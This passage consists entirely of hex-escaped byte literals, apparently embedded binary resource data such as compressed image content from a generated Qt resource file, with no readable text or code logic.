\x11\x24\xd3\x3a\xaf\x7e\xf5\x21\x63\x76\xdd\x9a\x31\x43\x86\x33\ \xf7\xbb\xc9\x38\x41\xc5\xe5\x3b\x8a\x35\xb7\xe5\xf9\xdf\xdd\xce\ \x5c\xe0\x14\x28\xba\xdf\x75\x91\x8a\x58\xe1\xcf\x94\xab\x7c\xa4\ \xb2\xe5\xaa\xda\xa4\x3b\x14\x98\xb2\x7e\xff\x44\x79\xfe\xf1\x94\ \xac\x2c\x49\x9e\xfc\xbb\x6e\xb9\xe0\x31\xad\x11\xa1\x36\xc9\xf8\ \xab\x2e\xe2\xde\x8b\xaf\xcf\xa9\x03\xf4\x94\x79\x3c\x74\xe7\xf3\ \x3c\x3e\xe1\x2e\x40\xca\x64\x1e\x65\x99\x41\xc1\x75\x53\xd7\x15\ \x04\x99\xa0\xda\x9f\xb0\x36\x98\xe7\xdf\xbe\x8b\x63\xf7\xbf\xb8\ \x83\x12\xb3\x6d\x5e\xfc\xe0\x76\xf6\xdb\xe5\xe4\x4c\x26\xb2\x0a\ \x01\x11\x51\x94\x90\x04\xaf\x6b\x4d\x1b\x2a\xa5\x28\x12\x46\x91\ \x25\xda\xa3\xf1\xcc\xbc\x47\x23\xa6\x9d\xfc\xc3\x1e\x1f\xee\xf9\ \xe3\x50\x17\xff\x95\xb1\x23\xb7\x61\x97\x7d\xb6\x2e\x28\x5d\x65\ \xb9\x0f\x4d\xd3\x72\xd9\xc7\x01\x7b\x1f\x8b\x69\xa6\xf0\xab\x95\ \x68\x52\x99\xdb\xb6\x8b\x63\x35\xe9\x53\x1f\xad\x6f\x59\x5e\xfb\ \x77\x02\x90\x7f\x3b\x89\x9e\xbf\x22\x9e\x01\xe3\x2b\x7d\xdb\x3e\ \xea\x1a\xb7\xb8\x53\x71\xd5\xd1\x2f\x09\x47\x02\xbc\xfa\xd6\x93\ \x5d\x02\x66\xe7\x20\x7a\xf4\xa1\xa7\xd1\xd2\xd2\x4a\x65\x60\xeb\ \x3c\xce\x50\x00\x21\x43\xaa\x23\x23\x0a\x32\xa2\xa0\x22\x09\x5e\ \x34\x39\x48\x38\x14\x26\x1c\xf2\xe3\xf7\x79\x11\x45\x81\x94\x6e\ \xd0\xde\x16\xa3\xb1\xb5\x99\x64\xba\x05\xd3\x8e\x61\x39\x29\x6c\ \xc7\xc8\xc8\xa6\x64\x3a\xbc\x72\xa1\xa5\xeb\x4a\x5b\xed\x34\xa7\ \x7f\x63\xc1\xfc\x85\xf4\x1d\x50\xd9\x7d\xd6\x74\xd5\x53\x5c\x76\ \xe3\x29\xf4\x0f\xed\xba\x46\xdb\x4d\xc7\x31\x68\xd5\x17\xd1\xae\ \xaf\x60\xec\x88\x6d\x78\xe0\xf1\x9b\xd6\x70\x01\xb9\xef\xba\xba\ \xb1\x96\xd3\xce\x3e\x9d\x84\xa3\x63\x8f\x8a\xb8\x17\x78\xca\x76\ \x83\x8a\x24\x64\x26\x80\xcd\x8e\x6e\xaa\xdf\x1b\xa0\x24\xd1\x05\ \xa3\x80\x82\x1c\xf2\xe0\x0d\x06\x91\x24\xc9\xf5\xc2\x6e\x8f\xb9\ \x36\xae\xc9\x8c\xbe\x91\xe9\xb8\x00\x94\x1f\x8d\xff\x2d\x3b\x14\ \xf2\xc8\xdc\x34\x34\x25\x21\x61\xe0\x09\x05\xe8\x3d\x7a\x30\x23\ \x36\x1a\xc3\xae\xdb\x8d\x63\x83\x41\x43\xf1\xfb\x02\xc4\x13\x71\ \x66\x2d\x5b\xc0\x97\xdf\x7f\xc3\xd2\x99\xf3\x58\x3c\x63\x1e\xa9\ \xd6\x18\x8e\x92\xe1\x11\x3c\x99\x56\xdd\x80\x92\xe1\x3c\xfe\x8d\ \x03\x83\x42\xde\x76\x50\xcc\x10\xe4\x7e\x09\x21\xa0\xe2\x09\xf8\ \x91\x14\x19\x3d\x91\xc4\x68\x4b\xb8\x3e\x1b\x49\xab\x43\x54\xf2\ \x8f\x7e\x1f\xd9\xd2\xa8\x47\x72\x4b\x56\x8a\x88\x93\xd5\xb4\x8a\ \x19\xf0\x5b\x03\x2a\x0a\x0f\x3c\xf4\x10\x9b\x0f\x1d\x93\x93\x64\ \xef\x4e\x18\x51\x10\x04\x6e\xb9\xe6\x61\x3e\xfe\xea\x75\x57\x59\ \x57\x29\xcd\x23\xcc\x7f\xbf\x34\xbb\xe3\x98\xb4\xa7\x97\xd3\xa6\ \x2f\xe6\xb0\xbd\xcf\xe1\xe5\xf7\xef\x2a\x70\xa9\x3c\x6a\xdf\xf3\ \xf8\xf8\xbb\xe7\xa9\xf0\x6f\x4c\x58\x1d\x86\x2a\x85\x09\xfb\xcb\ \xa9\x2c\x2f\xc3\xef\xf7\x90\x48\xea\xac\xa8\x5e\x4d\x5b\x6a\x39\ \x69\xab\x15\x1b\xeb\x4f\x7d\x3d\x8d\x89\x99\x88\x8a\xce\xeb\x6f\ \xbd\x88\xcf\xef\x41\x92\xa4\x82\x8e\xab\x2c\x69\xee\xf1\x78\x78\ \xf1\xf1\x4f\x19\x7f\xfe\xa1\xf8\xd5\x4a\x42\xea\x40\xfc\x4a\x6f\ \x54\x31\x4c\x8b\x3e\xe7\xa3\xc6\xe4\x6f\xfb\xe9\x66\xcc\x5e\x0f\ \x20\x6b\x58\x7d\x83\x3b\xbd\x1c\xd4\x06\x1d\xe9\x38\x69\x40\xc6\ \xb4\xa3\x2c\x6e\x7d\x97\xa3\x0e\x1e\xcf\x19\xe7\x1f\xb5\x46\x10\ \xa9\x5e\x56\xc7\x49\x27\x9f\x84\x57\xac\xa4\xd8\x3b\xaa\x20\x63\ \xc8\xd6\x3a\x05\x44\x44\x41\x75\x07\x85\x04\x1f\x9a\x12\x24\x1c\ \x0a\x11\x09\x05\xf1\x7a\x5d\x31\xb3\x94\x6e\xd0\xda\x1a\xa5\xa9\ \xb5\x19\xdd\x68\xc6\x74\x62\x58\x4e\x1a\xdb\x31\xb0\x9d\xec\x76\ \xad\x67\x10\x69\x88\xff\xc6\xe6\x9b\x6e\xc5\xd7\x3f\xbf\xd9\xed\ \x7b\x8c\x45\x93\xf4\xa9\x1a\x80\xa9\x8b\x14\x79\x86\x21\x8b\x81\ \xb5\x5c\x10\x06\xd1\x74\x35\xcd\xa9\x79\x0c\xec\x3d\x96\xc7\x27\ \xdc\x87\xa6\x49\x6b\x04\x11\xcb\xb1\x39\xe1\xc2\x33\x58\x3e\x65\ \x2e\x8c\x2d\x86\x01\x21\x97\xd0\x74\x70\xef\x73\x68\x67\xff\x7e\ \xc3\xa3\x7c\x9d\x2c\x8f\x9b\xd5\x64\xbb\x79\x44\x41\xc4\x30\xf4\ \x42\x20\x49\xdb\xee\x31\xff\x16\x40\xe2\x64\x5c\xef\x4c\x17\x48\ \xa3\x69\x77\x48\xce\xb4\xdd\xdf\xd9\x9d\xde\x67\x36\x7b\x53\xa4\ \x8e\x32\xa0\x47\xea\x18\x8e\x53\xa5\x7f\x9f\xd6\x55\x3e\x70\xc8\ \xa2\xfb\x1a\xfd\x12\x04\x54\xbc\x01\x3f\xa2\x24\x63\xe8\x29\xd2\ \x6d\x89\x8e\xef\x22\x7b\x0e\x38\x7f\xf2\x98\x5e\x19\x82\x99\x49\ \x7b\x2d\xc3\x77\xc4\x0d\x58\x16\x85\xe5\xed\x94\x54\x56\xf0\xd6\ \xd3\x2f\x13\xf4\xf8\x0a\x64\x65\xba\x03\x8f\xcb\xfe\x79\x2b\x3f\ \x4e\xfd\x04\x59\xd0\xf0\xe4\xc0\x23\xf2\xa7\x7c\x3d\xb2\x20\xd2\ \x9a\x5a\xcc\xa1\x7b\x9c\xc5\xf3\xef\xde\x56\x20\xef\x7f\xf4\x01\ \xe7\xf1\xd5\xcf\xaf\xd1\x27\xb8\x13\x7d\xc2\xdb\x50\x51\x56\x46\ \x28\xe4\x47\x37\x4c\x56\xaf\xae\xa3\x31\xba\x14\xdd\x6a\xc1\x76\ \xd2\x7f\xea\x2b\x8a\xa7\x57\xd1\x9c\x9a\xcb\xb5\x57\xde\xc6\x4e\ \xbb\x6f\xb6\xc6\xae\xab\x44\x34\xcd\xd0\xc1\xa3\x49\xe9\x31\xc2\ \x9e\x41\x04\x94\xfe\x68\x72\x11\xb6\xad\xaf\xae\x8d\x7f\x3f\xae\ \x4d\x5f\x39\x9f\xbf\xd9\xfa\xb7\xce\x81\x74\xb7\xae\xb8\xe6\x82\ \x26\xbf\x52\x79\x98\x2c\xfa\x55\xb0\x91\x45\x1f\xb6\x93\x66\xfa\ \xbc\x89\xec\xba\xf3\xee\x04\xc3\xfe\x1e\xcb\x59\xe1\x48\x00\x3b\ \xe9\xe5\xe7\xdf\x3e\xc5\x2b\x17\x23\x0b\x1e\xf7\x8c\x17\xf2\x22\ \x56\xee\xe7\x0c\xd9\x6e\x3b\x98\x16\xae\xde\xbf\x28\xa3\x28\x32\ \xb2\x2c\x21\xc9\x22\x82\x20\x92\x4e\x67\xa5\x52\x9c\x3c\xe0\x70\ \xba\xb9\xa2\xc8\x04\xee\x34\x2d\xfa\x1c\x5e\x7e\xe9\x65\xfa\xf4\ \xaf\xe8\xf6\x3d\x5e\x7a\xd6\x9d\x7c\x3b\xe9\x3d\x02\x6a\x25\xaa\ \x14\x5c\xab\x10\x9c\x20\x48\xa8\x52\x00\x45\xf4\xd3\xd0\xba\x84\ \x4f\x3e\xfc\x9a\x3d\xf6\xdc\x0d\xcd\xa3\xf4\x08\x22\xa2\x20\x70\ \xc8\x9e\xfb\xb3\xd2\x6a\x67\xc9\x37\xd3\xdd\x00\xd2\x2b\xe0\x06\ \x4f\xdb\x71\x03\x9f\x4f\x06\x47\x70\x27\xad\xff\xc8\x8e\xde\xce\ \x04\x63\xdd\xc2\x4e\x19\xa4\x53\x29\x2c\xc7\x44\xf1\x78\xf1\xf8\ \xfd\x48\x7e\x15\x53\x71\xf2\xba\xc0\x84\xee\x83\xd1\xff\xd7\xa0\ \x9b\x19\x80\x54\xa5\x1c\xf8\x11\x54\x5d\xdd\x2a\xbf\xe2\x0e\x01\ \x66\x65\xc6\x03\x0a\xf8\xd5\x0e\x99\xf3\x50\xe6\x16\xcc\x64\x1f\ \xca\xbf\xa1\x64\x95\xdf\xa8\x20\x66\xb2\x00\xaf\x0c\x41\x15\xa1\ \x58\xc3\x5b\x1c\x42\xf3\x78\x30\x0d\x83\x54\x73\x3b\x56\x73\xc2\ \xe5\xb0\x12\x7f\x82\x20\xcf\x2f\x78\x6b\x19\xd0\xf4\x49\xee\x67\ \x25\x0a\x2e\x30\x25\x2d\x98\xd9\x04\x8b\xda\xd8\x6c\x8f\x9d\x78\ \xeb\xa1\x67\x91\x45\xa9\x8b\x19\x54\x3e\x78\x58\x96\xc3\x69\x27\ \x5c\xc0\xb4\x39\x13\x51\x24\x2f\x5e\xa5\x0c\x9f\x5c\xf6\x87\x33\ \x8f\xc2\xaf\x59\x44\x93\x42\x08\x82\xc0\xd4\xf9\x9f\x32\xf3\xa7\ \x3a\x0e\x38\x6c\xd7\x5c\x19\x6d\xdf\x83\x77\x66\xea\x77\xcb\x99\ \xb5\xec\x13\x7a\x97\x0e\xa3\x57\xd9\x40\x6c\xdb\xa6\xbe\xbe\x89\ \x86\xb6\x15\xa4\xad\x66\xac\x3f\xe1\x6d\x9e\xbd\x48\x9a\x12\xb3\ \xd8\x72\x93\x1d\x39\xf9\xcc\xc3\x73\xa4\x79\x3e\x78\x64\x67\x92\ \x54\x55\x65\x9f\x1d\x4f\x60\xe9\xea\x19\x04\xd4\x5e\x04\xd4\x2a\ \x54\x29\x82\x84\x46\x7d\xf2\xa7\x27\x5b\x53\xcb\x5e\xe2\x6f\xb8\ \xfe\x76\x19\x08\x40\x89\x6f\xe4\x35\x15\xbe\x6d\xae\x75\x1c\x2b\ \x37\x19\xbe\xa2\xed\x63\xca\xca\x8b\x79\xe1\xb5\x47\x0b\xb2\x8f\ \xee\x5e\xff\x29\xc7\x9d\x47\xf5\xaa\x6a\x2a\xfd\x5b\x75\xc4\xa9\ \x0c\x19\xde\x91\x89\x48\x99\x72\x96\x07\x59\xf0\xe1\x55\xc3\x6e\ \x39\x2b\xec\xc7\xeb\x71\x4f\xde\x44\x42\xa7\xb5\xbd\x9d\xe6\x96\ \x16\xd2\x56\x6b\xb7\x99\x48\x07\x98\xb8\xf7\x2d\xc9\x05\x94\xf7\ \x0a\x32\x7f\xe9\xaf\xdd\x82\x5c\x7b\x5b\x9c\xbe\xbd\x07\xa2\xeb\ \x06\x61\xad\x1f\x1e\xa9\x7c\x9d\x95\x44\x1d\xc7\x44\xb7\x5b\x68\ \x4e\xcc\xc5\xeb\x0d\x70\xd7\x5d\x77\x32\x6c\x54\xbf\x35\x66\x22\ \x82\x20\xf0\xfd\xac\x29\x5c\x73\xc5\x95\xe8\x92\x05\x43\x23\xee\ \x85\x0f\xae\x47\xb8\xed\xb8\xc3\x5d\xb6\xe3\xee\x4e\xff\x88\xfd\ \x6a\x7e\x46\x92\x99\x21\x11\x83\x1a\x5e\xbf\x1f\x49\x51\xb1\x8c\ \x34\xa9\x44\x02\x2b\x9a\xe9\xf4\xd1\x6d\x77\x8e\x24\x3f\xa0\xfd\ \x3b\x4b\x5b\x76\x66\xc8\xcd\xce\x64\x20\xf9\xe7\x94\x90\x99\xea\ \x17\x85\xcc\x84\xff\xbf\xa9\x54\x25\x74\xca\x8a\x14\xd1\xfd\xfe\ \x7c\x0a\xa2\x4f\x41\xf3\xfb\x10\x44\x01\x23\xa9\x63\xc4\x32\xc4\ \x78\x2a\xe3\x2d\xee\xfc\xc9\xcf\x37\x7b\x6c\x55\x74\x01\xd4\x9b\ \x01\x4e\x27\x63\x41\x9b\x29\x59\xc9\x29\x38\xfb\xaa\x4b\xf8\xc7\ \xee\x07\xe7\xca\x45\x59\xb2\xdc\xce\xdb\xa4\x08\x82\x40\x7b\x6b\ \x82\x53\x4f\x3c\x9b\xda\xe6\x65\x28\x92\x1f\xaf\x5c\xe4\x76\x5b\ \x89\x91\xbf\x54\x96\xdd\xcd\x44\x96\xd1\x9a\x5a\xcc\x5e\x3b\x1c\ \xcb\x53\xaf\xde\x5a\xe0\x56\x79\xdc\x61\xe7\xf2\xeb\xec\x2f\xd8\ \x75\xec\xf9\x88\xe9\x2a\x6a\x1a\x97\x92\xb2\xea\xff\x34\xef\xe1\ \x56\x22\xa6\xe1\xf1\x29\xbc\xf1\xee\x73\x28\x8a\x9c\x2b\x5d\xe5\ \x0f\xb3\x66\x41\xe4\xbd\x97\xbf\xe3\xe8\x53\xf6\xc1\x23\x47\x08\ \xa9\x03\xf0\x2b\x7d\x50\xc5\x10\x31\x63\xd5\xaf\xb5\xf1\x9f\x77\ \x4e\x5b\xb1\xe8\xdf\x11\x40\xfe\x76\x19\x08\xc0\xd5\xd7\xfe\x6b\ \xba\x47\x0a\x6d\xa5\x49\x45\x03\xc0\x41\x44\xc2\xa3\x14\xb1\xac\ \xe1\x7b\x8c\x76\x2f\x9b\x6d\xbd\x41\x97\x40\x99\xbf\x76\x1c\xb7\ \x1d\x6f\xbe\xf9\x26\x89\x74\x33\x7e\xa5\xa2\xe0\x4a\x70\xb2\x19\ \x48\xee\x69\x6e\x26\x62\xdb\xe0\xd8\xb8\x22\x6a\xb2\x9b\x85\xc8\ \xb2\x84\x28\xba\xa0\x93\x4e\xd3\x21\x95\x22\x74\x44\xbd\xfc\x69\ \x75\xc7\x31\x68\x48\xfd\xc6\x23\xf7\x4d\x60\xf4\x46\x83\xbb\x7d\ \x6f\xff\x3c\xe5\x66\x7e\x9e\xfa\x39\x01\xb5\xd2\x15\x83\x13\xd7\ \xdd\x41\x4d\xc8\xb8\xa2\x79\xe4\x12\xda\x93\x2b\xf9\xe8\x93\xf7\ \x29\x0b\xf5\x67\xe8\xc8\x35\x83\x48\xff\x8a\xde\x1c\x76\xe8\xa1\ \x7c\xfd\xd3\x0f\xb4\x4f\x5e\xee\x06\xa0\xb0\xea\x02\x87\x03\xa8\ \x42\x87\x2b\x9c\x65\xff\xb9\x40\x6c\xd8\x90\xb2\x71\x92\x26\x46\ \x2a\x85\x6e\xea\xc8\xaa\x82\xe6\xf3\xa1\x06\xbd\x38\x1e\x09\x5b\ \xce\x66\x25\x62\x87\x70\xc0\xff\x3f\x77\xe1\xae\xc1\x31\x2b\xcb\ \xa2\x64\x44\x29\x55\x29\xef\x26\xfe\x3e\x9d\xb1\xff\xab\x8c\x43\ \xcc\x70\x4f\xd9\xac\x29\xac\x22\x17\x79\xd1\xc2\x01\x64\x55\x21\ \x9d\x4a\x91\x6e\x8e\x63\x37\x27\x5d\xe3\xac\x64\x66\x80\xf4\xcf\ \x02\x73\x56\x27\x4b\x95\x32\x4d\x18\x32\x82\x22\x65\xf8\x24\x0b\ \x16\xb7\xc1\x8f\xb5\x94\xf4\xa9\xe4\xb5\x97\x5e\x61\x87\xd1\x9b\ \x75\x01\x8f\xfc\xac\x43\x14\x45\xe6\xcf\x5e\xce\xe9\xa7\x9d\x4d\ \x53\xfb\x6a\x3c\x19\x61\x44\x57\x24\xf0\xaf\xf6\xf4\xc8\x66\x22\ \x61\x04\x41\x64\xd6\xe2\x6f\x98\xf6\xe3\x72\xf6\x39\x70\x5c\x2e\ \x13\xd9\xe7\x80\x71\xfc\x32\x71\x1e\x3f\xce\x7e\x15\xcc\x00\x96\ \xa3\x67\x74\xae\xfe\xdc\x07\xd7\x96\x5a\x44\xca\x69\xe0\xbe\xfb\ \xee\xa3\xac\xa2\xa8\x80\xf7\xc8\x07\x11\x4d\xd3\x48\x25\xd3\xec\ \xba\xdb\x2e\xae\x84\x90\x5a\x85\x4f\xee\x8d\x22\xfa\xb1\x31\x63\ \x0d\xc9\x5f\x4f\x4d\x1a\x4d\xf3\xf8\x9b\xae\xbf\x25\x80\x5c\x75\ \xf5\xe5\xa9\xab\xae\xb9\x64\x55\x50\x1d\xb0\xb7\x28\xa8\x3e\x00\ \x45\x0c\x62\xa3\x33\x6d\xce\x37\xec\xb8\xfd\x38\x8a\x8a\x43\x3d\ \x82\x88\xc7\xa3\xd2\xa7\x62\x08\x5f\x4e\x7c\x17\x41\x90\xd0\xa4\ \x48\x7e\x98\xef\x28\x63\xe5\x01\x81\x83\x8d\x65\xbb\x40\x22\x0a\ \x62\xa6\xc5\x4e\x42\x91\x65\x04\x51\xc4\x71\x04\x8c\x74\xa6\x94\ \xe5\xd8\x05\xcf\x15\x32\x27\x5b\x2c\x5d\x4d\x28\xe4\xe3\xb1\x67\ \xee\x46\x92\xba\x36\xb8\xb5\xb7\xc4\x38\x69\xfc\xd1\x60\x2b\xf8\ \x94\xf2\x8c\x24\x83\xf4\xbb\x2f\x08\x51\x90\xf1\x2a\x25\xa4\x8c\ \x16\xbe\xff\xf9\x4b\x9a\x6a\xd2\x6c\xbd\xfd\x26\x6b\x04\x11\x55\ \x52\x38\x74\xef\x03\x68\x52\x74\x16\x7e\x37\x1d\xa7\x35\xe5\x76\ \x0f\x39\x99\x28\x25\x65\xb4\x91\x24\xc9\x0d\x96\x9d\xf9\x80\xdf\ \x03\x24\x4e\x06\x48\x74\xb7\xb4\x61\x26\x74\xd2\x46\x0a\xc7\x71\ \x50\x3d\x1e\xb4\xa0\x0f\xd1\xa7\x62\xaa\x64\x76\xf5\x42\xa6\x14\ \xe4\x74\x0d\x9c\xff\x8b\xab\x00\x34\x84\x8e\x72\x63\x50\x85\xb0\ \x86\x5a\xec\x47\x0d\x78\x5d\xbe\x2e\x9e\xc0\x6c\x89\xe3\x34\xe9\ \x6e\xa9\x2a\x65\xfd\xf9\x52\x15\x79\xc7\xcf\x88\x53\xba\x5d\x56\ \xb2\xfb\x3d\xa5\x4c\x17\x3c\xa6\xd6\x23\xac\x88\xb3\xfd\xe1\x7b\ \xf3\xfa\x03\xcf\xe0\x57\xbd\x5d\x64\xf4\x3b\xf3\x1d\x6f\xbc\xf8\ \x05\xd7\xdd\xf8\x2f\x52\xe9\x28\x5e\xc5\xcd\x3a\xbc\x72\x19\xaa\ \x18\xfc\xcb\xc1\x23\xfb\x46\x44\x41\x42\x93\x8b\x90\x44\x99\x39\ \x4b\x27\x32\xed\xc7\x15\xec\xb5\xff\x8e\x39\x52\x7f\xcf\x7d\x77\ \x66\xf2\xf7\xf3\x99\xb7\xea\x33\x34\x29\x84\x24\x7a\xfe\xd4\x11\ \x75\xab\x95\xc6\xe4\x74\x8e\x3c\xf0\x54\xf6\xd8\x6f\xbb\x02\xde\ \xa3\x33\x78\xa8\xaa\xca\xce\x5b\x1d\xce\xf2\xda\x39\x04\xd4\x4a\ \x7c\x72\x2f\xf7\xb5\x0a\x1e\x9a\x53\x33\xef\x69\x49\x2d\x7e\xfc\ \xef\x7c\xaa\x8a\x7f\xd7\x17\x16\x4d\xd7\x7c\xd1\x9c\x9a\xfe\x64\ \xb6\xad\x57\x00\x2a\x7d\xdb\xa0\x08\x45\x5c\x7c\xc1\xe5\x39\xa5\ \xd5\x9e\x40\x64\xa7\xdd\x37\x63\xa7\x6d\xf6\xa5\x29\x39\x1b\xd3\ \x4e\x14\xf2\x1e\x4e\xc7\xbd\x9d\x91\x81\xb7\x33\x33\x22\x89\x54\ \x94\xb6\xf6\x28\xd1\x68\x82\x54\x3a\x33\x68\xe8\xf3\x12\x09\x07\ \x09\x87\x22\x99\x69\x75\x3f\x12\xf9\x8e\x86\xae\x2d\x6e\x2c\xbd\ \x8a\x7f\x1c\x7b\x2e\x8a\xda\xbd\xd8\xde\xe5\xe7\xdd\x43\x2c\xd1\ \x8e\x47\x2e\x42\x11\x83\x20\xfc\x31\xbb\x53\x41\x90\x90\xc5\x00\ \x25\xde\x31\x68\x72\x11\xef\x7e\xfc\x3c\x67\x9f\x7a\x45\xb7\x2a\ \xc6\xd9\xba\x73\xf6\x76\xf1\x71\x67\xf0\xcc\x73\xcf\x11\xf1\x85\ \x61\xe2\x6a\xa8\x89\xbb\xe5\xa4\x84\x09\x26\x6e\x6d\x3b\xeb\x95\ \xbe\x2e\xa2\x8c\x3d\x82\x08\x1d\x4e\x88\x6d\x69\xa8\x4f\x61\xd4\ \xb4\x13\x5f\xdd\x4c\xac\xb9\x15\xc7\x76\xf0\x87\xc3\xf8\x2a\x8b\ \x50\x2a\x83\x50\xe6\x71\xe7\x49\x02\x3d\x0c\x26\x0a\xff\x43\xa0\ \x91\x95\x02\xc9\x06\xef\x52\x0f\x52\x65\x00\xad\x2c\x88\x27\xe4\ \xc7\x36\x4d\x92\x4d\xed\xe8\xab\xdb\xdc\x76\xdc\x26\xdd\x25\xb0\ \xb3\xd2\x32\x7f\x45\xd6\xa1\x49\xe0\x75\x3b\xcc\x44\x9f\x82\xa8\ \x66\x0c\xa0\x52\xa6\x4b\x94\xff\xb0\x1a\xaf\xad\x72\xff\xd3\x8f\ \xf1\xd0\xe5\x37\x17\x10\xd4\x3d\xca\xb1\x5f\x7e\x1f\x0f\x3e\x76\ \x0b\x96\x65\xe2\x55\x4a\xf1\x48\xa5\x19\x67\xbd\x00\x42\xde\xb5\ \x60\x3b\x26\xa6\x95\xc0\xb4\x52\xd8\x4e\x1a\xc7\x31\x32\xf7\xd6\ \xef\xfe\x50\xb3\x25\x6b\x45\xf4\x53\xea\xd9\x88\x4a\xff\x16\x7c\ \x37\xe5\x5d\xc6\x9f\x70\x79\x8e\x9f\x71\x1c\x87\x87\x9e\xbc\x85\ \x31\x43\xb7\xa1\x26\xfe\x13\xba\xd9\xfc\xa7\x3e\xbe\xd6\xe4\x42\ \x86\x0f\xd8\x94\xf1\xe7\x1d\x99\x73\x18\xcc\x72\x1f\xf9\xc0\xa1\ \xaa\x2a\x4f\xde\xf5\x36\xbf\xce\xf9\x18\xaf\x1c\xce\x39\x2b\x4a\ \x68\x24\xcc\x9a\x49\x51\x63\xd5\xdd\x7f\xfb\xd3\xf6\xef\xc8\x81\ \x64\x97\x5f\x29\x0d\x96\xf9\xb6\xf8\x34\xa4\x0c\xde\xda\xc1\x40\ \x10\x14\x0c\x3b\xc1\xbc\xe6\x67\xd8\x67\xdc\x51\x5c\x7e\xfd\x99\ \x5d\x78\x90\xce\x3f\x1f\x73\xd8\x78\x9a\x9a\x9a\xa8\x08\x6c\x4e\ \xe1\x1c\x87\xe0\x1a\x49\x09\xd9\x7b\x19\x29\xe7\x3e\x16\x24\xe0\ \x0d\x13\x09\x87\x09\x85\xfc\xa8\x8a\x8c\x69\x39\xc4\x63\x09\x9a\ \x5b\x5b\x69\x8b\xb5\x60\xd8\xed\x58\x76\x12\x8b\x14\xb6\x63\x13\ \xd3\x57\x92\x12\x97\xb1\x72\xf5\x32\x82\x21\x7f\x57\x40\x6c\x8f\ \xd3\xa7\x6a\x20\xba\x6e\x12\xd6\xfa\xe3\x95\xca\xd6\xba\xe3\x8a\ \xa7\x57\xd3\x9e\x5e\x8e\x4f\x2e\x23\xec\x19\xd2\x4d\x9c\x76\xb0\ \x1d\x9d\x58\x7a\x05\x2d\xa9\xc5\x94\x17\xf5\xe3\xee\x7b\xef\xa0\ \xdf\xc0\xca\xb5\xf2\x22\x82\x20\x70\xe9\xbd\x37\xf1\xe3\xfb\x9f\ \x63\x07\x65\xd7\x2b\x42\x13\x3b\xe4\xdb\xb3\x83\x65\x69\xdb\x95\ \xdf\xfe\xb3\x81\x29\x5f\x4e\x43\x91\x72\xc7\x12\xbd\x0a\xaa\xcf\ \x8b\x28\x89\xd8\x96\x8d\xa1\xeb\x58\xc9\xbc\x36\xe0\xb4\xed\x96\ \x4b\x3a\xef\xaa\x9d\xff\x12\xd0\xc8\x7d\x36\x19\x8e\x45\x91\xc0\ \xe3\x72\x49\x82\x47\x46\xf1\x68\x08\x82\x88\x6d\x9a\x18\x29\xbd\ \xc3\x47\x23\x9d\xe1\x91\xec\xbf\xf0\xb3\x90\xf2\x34\xac\xb2\x25\ \x4d\x25\xa3\xb6\x9c\xb6\xdc\xe3\x4e\x6b\x80\xba\x24\x1b\xef\xbe\ \x2d\x4f\xdf\x72\x3f\xa2\x23\x74\x5b\xb2\xca\x07\x8f\x64\x5c\xe7\ \xac\xd3\x2e\x65\xe1\x8a\xa9\xa8\x92\x1f\x8f\x5c\x84\x47\x2e\x42\ \x15\x8b\x90\x44\x5f\x41\x09\x37\x9e\x5e\x49\x53\x6a\x36\x8a\xa2\ \x62\xdb\x19\x20\xca\x5d\xcf\x36\x8a\xe0\x73\x37\x6c\x82\x90\xb9\ \xcf\x0e\xfa\x66\x39\xce\x0e\x53\x1c\x59\xf4\x22\xa2\xb8\x6d\xfb\ \xa2\x17\x4d\x0c\x11\xf0\x47\x70\xe4\x18\xf3\x56\x7f\xc2\x26\xa3\ \x76\xe6\xbe\xc7\xae\xeb\x88\x19\x82\xc0\x59\x27\x5f\xc6\xcc\x05\ \x3f\xd0\xcb\xbf\x15\x5a\x0f\xe2\xa7\x6b\x5a\x8d\x89\xe9\x88\x4a\ \x9a\xd7\xdf\x7a\x09\x7f\xc0\x8b\x24\x49\x05\x4a\xd0\xf9\xbc\x47\ \x53\x7d\x3b\xc3\x86\x0e\xc7\xb2\x4c\x82\x5a\x3f\x02\x4a\x1f\x54\ \x29\x82\x83\x15\xab\x8f\xff\x72\x68\x9b\x5e\xfd\xe9\x7a\x00\xf9\ \x93\x2b\xa8\xf5\xd9\xb6\x4f\x60\xd7\x4f\x65\xd1\xef\x77\xaf\x33\ \x85\x86\xe4\x2f\x34\x24\xa6\x72\xe7\xed\x0f\xb1\xd9\x56\x23\xd6\ \x08\x22\xcd\x8d\x51\x8e\x39\xea\x58\x04\x3b\x40\xa9\x6f\x83\xbc\ \x9d\x49\xc7\x0e\x05\x41\xca\x58\xdb\xae\x05\x44\x4c\x8b\x58\x2c\ \x41\x4b\x5b\x7b\x1e\x88\x24\xb0\x48\xb1\xa8\xe5\x6d\x8e\x3b\xe8\ \x7c\x9e\x7b\xab\xfb\x4d\xc3\xb9\x27\xdd\xc8\x03\xcf\x5c\x45\xc4\ \x33\x08\xbf\x52\xe5\x66\x20\x3d\x6c\xab\xd3\x56\x94\xb6\xd4\x42\ \x24\xd5\xe2\xb4\x13\x2f\xe4\xb5\xb7\x9e\xa3\xb1\xb1\xa9\x07\x21\ \x46\x07\xdb\x31\x48\xdb\x6d\x34\x27\xe6\x22\xc9\x0a\xa7\x9f\xfc\ \x4f\x0e\x3a\x6a\xdc\x5a\x41\x04\x60\xce\xca\xc5\x5c\xf2\xaf\xcb\ \x68\x5d\x5a\x03\xfd\x43\xee\xc0\x5d\x96\xa0\xf5\xc8\x19\x5e\xc3\ \x72\xf9\x12\xfd\x2f\x2c\x8f\x64\x49\xf7\x6c\xc0\xf4\xc8\x88\x99\ \x80\x29\x4a\x12\x96\x69\x62\x1a\x06\x76\x2a\x8f\x0c\x4e\x3b\x1d\ \xed\xc0\xce\x7f\x20\xa0\x08\x3d\x70\x2f\x59\x43\x30\x4d\x02\x8f\ \x3b\x9d\x2c\x48\x22\x8e\x65\x63\xa4\x33\x7c\x46\x16\x50\xf3\x1b\ \x1d\x9c\xbf\xf0\x75\xc9\xa2\x5b\xa6\x0a\xa9\x28\x7e\xb7\x84\x63\ \x24\xf4\xcc\x77\x6f\xbb\x5c\xc7\x8c\x26\xfc\x55\xc5\xdc\x74\xc7\ \xad\xec\xba\xe1\x36\x5d\x6c\x83\xf3\xb3\x0e\x70\x4d\xbc\xa6\xfe\ \x3c\x9f\x2b\xaf\xbe\x9c\x58\xb2\x05\x45\xf2\xe3\x91\x22\x78\xe4\ \x12\x54\x29\x8c\x28\x68\x05\xe0\x11\x4b\x57\xd3\x66\x2c\xe0\xe2\ \x33\x6e\x63\xfc\x05\x87\x93\x4e\x19\x2e\xe1\xad\x9b\x18\x29\x9b\ 